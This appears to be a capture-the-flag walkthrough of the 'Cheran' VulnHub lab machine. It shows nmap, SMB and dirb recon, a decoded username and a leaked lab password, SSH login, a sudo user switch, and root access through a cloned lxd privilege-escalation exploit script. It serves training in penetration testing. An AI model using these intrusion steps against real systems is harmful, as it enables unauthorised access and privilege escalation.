Cheran 1
First step port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon cheran.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
WWA for the #15 !
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 14:34 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating ARP Ping Scan at 14:34
Scanning cheran.vuln (10.0.2.9) [1 port]
Completed ARP Ping Scan at 14:34, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:34
Scanning cheran.vuln (10.0.2.9) [65535 ports]
Discovered open port 22/tcp on 10.0.2.9
Discovered open port 445/tcp on 10.0.2.9
Discovered open port 80/tcp on 10.0.2.9
Discovered open port 139/tcp on 10.0.2.9
Completed SYN Stealth Scan at 14:34, 1.40s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.9.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Nmap scan report for cheran.vuln (10.0.2.9)
Host is up (0.000058s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:A6:29:55 (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.57 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[+] [smb]
SMB cheran.vuln 445 UBUNTU [*] Windows 6.1 (name:UBUNTU) (domain:) (signing:False) (SMBv1:True)
[+] Guest session IP: cheran.vuln:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (ubuntu server (Samba, Ubuntu))
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP UBUNTU
[~] [smb knocker]
[print$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[IPC$]
Current directory is \\cheran.vuln\IPC$\
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
[+] [fuzzin server]
http://cheran.vuln [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.0.2.9], Open-Graph-Protocol[article][166816780017302], Script[text/javascript], Title[A complete list of Chera Rulers and their contribution]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Jul 13 14:34:12 2022
URL_BASE: http://cheran.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://cheran.vuln:80/ ----
+ http://cheran.vuln:80/admin.php (CODE:200|SIZE:100)
==> DIRECTORY: http://cheran.vuln:80/images/
+ http://cheran.vuln:80/index.html (CODE:200|SIZE:21614)
+ http://cheran.vuln:80/robots.txt (CODE:200|SIZE:21)
+ http://cheran.vuln:80/server-status (CODE:403|SIZE:276)
==> DIRECTORY: http://cheran.vuln:80/users/
==> DIRECTORY: http://cheran.vuln:80/youtube/
-----------------
END_TIME: Wed Jul 13 14:34:13 2022
DOWNLOADED: 4612 - FOUND: 4
recon reports four tcp ports open 22 for ssh, 80 for http, 135 and 445 for smb
┌──(root@ghost)-[/home/ghost]
└─# curl -s cheran.vuln/users/ | sed -e 's/<[^>]*>//g'
Index of /users
Index of /users
NameLast modifiedSizeDescription
Parent Directory -
Rajasimha.html2020-07-29 13:02 1.0K
cheran.html2020-07-29 12:19 176
Apache/2.4.29 (Ubuntu) Server at cheran.vuln Port 80
┌──(root@ghost)-[/home/ghost]
└─# curl -s cheran.vuln/users/Rajasimha.html
Rajasimha
Find me...
<!--
+++++ +++[- >++++ ++++< ]>+++ .<+++ +++[- >++++ ++<]> +++++ +++.- .----
---.< +++[- >+++< ]>++. <++++ [->-- --<]> -.<++ ++[-> ++++< ]>+++ .-.<+
+++++ ++[-> ----- ---<] >---- ---.< +++[- >---< ]>--- .<+++ +[->- ---<]
>---. ---.+ ++.-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ .<+++ +[->+
+++<] >++++ .+.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++
+++++ [->++ +++++ +<]>+ +++++ +++.< +++[- >+++< ]>+.< +++++ ++++[ ->---
----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++ [->-- -<]>- --.--
-.<++ +++++ +[->- ----- --<]> ----- .<+++ ++++[ ->+++ ++++< ]>+++ +.<++
+++[- >++++ +<]>+ ++++. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.---
-.<++ +[->- --<]> ----. <+++[ ->+++ <]>++ +.--- ----- .<+++ ++++[ ->---
----< ]>--- ---.. .<+++ ++[-> ----- <]>-- ----- -.--- .<
-->
Brainfuck encode, decoded means This is the Username...
After a bit scrappin' and visiting youtube links we found https://www.youtube.com/watch?v=jQqbhtw7Faw Cheran_Vulnhub_User_Password, analyzing source code we get <meta name="description" content="Cheran_Vulnhub_User_PasswordPassword : k4rur">
┌──(root@ghost)-[/home/ghost]
└─# ssh Rajasimha@cheran.vuln
The authenticity of host 'cheran.vuln (10.0.2.9)' can't be established.
ED25519 key fingerprint is SHA256:bIEC4Rwz61rgp7mqsqUIOiHq+JZ68ACsyG6CaAakEaU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cheran.vuln' (ED25519) to the list of known hosts.
Rajasimha@cheran.vuln's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Jul 14 00:56:03 IST 2022
System load: 0.02 Processes: 102
Usage of /: 31.4% of 9.78GB Users logged in: 0
Memory usage: 15% IP address for enp0s3: 10.0.2.9
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
76 packages can be updated.
1 update is a security update.
*** System restart required ***
Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$
Logged
Rajasimha@ubuntu:~$ sudo -l
Matching Defaults entries for Rajasimha on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User Rajasimha may run the following commands on ubuntu:
(ALL, !root) /bin/bash
User Rajasimha can run /bin/bash as root so let's switch to the other user in the system
Rajasimha@ubuntu:~$ sudo -i -u cheran /bin/bash
[sudo] password for Rajasimha:
cheran@ubuntu:~$ cat /etc/group | grep lxd
lxd:x:108:cheran
User is in lxd group, time to privilege escalation. If you use searchsploit you will find S4vitar's lxd exploit, love to my exploit comrade check his awesome contributions, but I will use lxd-privesc-exploit
┌──(root@ghost)-[/home/ghost]
└─# searchsploit lxd
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Ubuntu 18.04 - 'lxd' Privilege Escalation | linux/local/46978.sh
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
cheran@ubuntu:~$ git clone https://github.com/0bfxgh0st/lxd-privesc-exploit.git
Cloning into 'lxd-privesc-exploit'...
remote: Enumerating objects: 93, done.
remote: Counting objects: 100% (93/93), done.
remote: Compressing objects: 100% (90/90), done.
remote: Total 93 (delta 27), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (93/93), done.
cheran@ubuntu:~$ cd lxd-privesc-exploit
cheran@ubuntu:~/lxd-privesc-exploit$ bash lxd-privesc-exploit.sh
[+] Building lxd privesc exploit
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]:
Create a new BTRFS pool? (yes/no) [default=yes]:
Would you like to use an existing block device? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=15GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
To start your first container, try: lxc launch ubuntu:18.04
Image imported with fingerprint: 6660ba8332f9ae75637afe2e6713f1e257163aa6c7ae3c8e338392d117dcb7ba
Creating x0bfxgh0st
Device container added to x0bfxgh0st
~ # cat /mnt/root/root.txt
Bow & Arrow (/,**
%%/ /***********/(.Cheran Flag.)/*******////*/*
/(,, /*****/((((//******/ //
/(, .,, /(
/(, */, /
(#, , ,,, ./
(# , ,,, //
(# .. ,,, /(
## .(,,,,,,,,,,,,,,, /,
## * ,, *.
## , ,, *
## * .,,, /*
## **, /*
#% ,, *****
#% **, .*****************,
#%*.
%% Congrats...
##
##
#( Here is the Flag...
#*
.#*
.(* Share your screenshot in telegram : https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg
*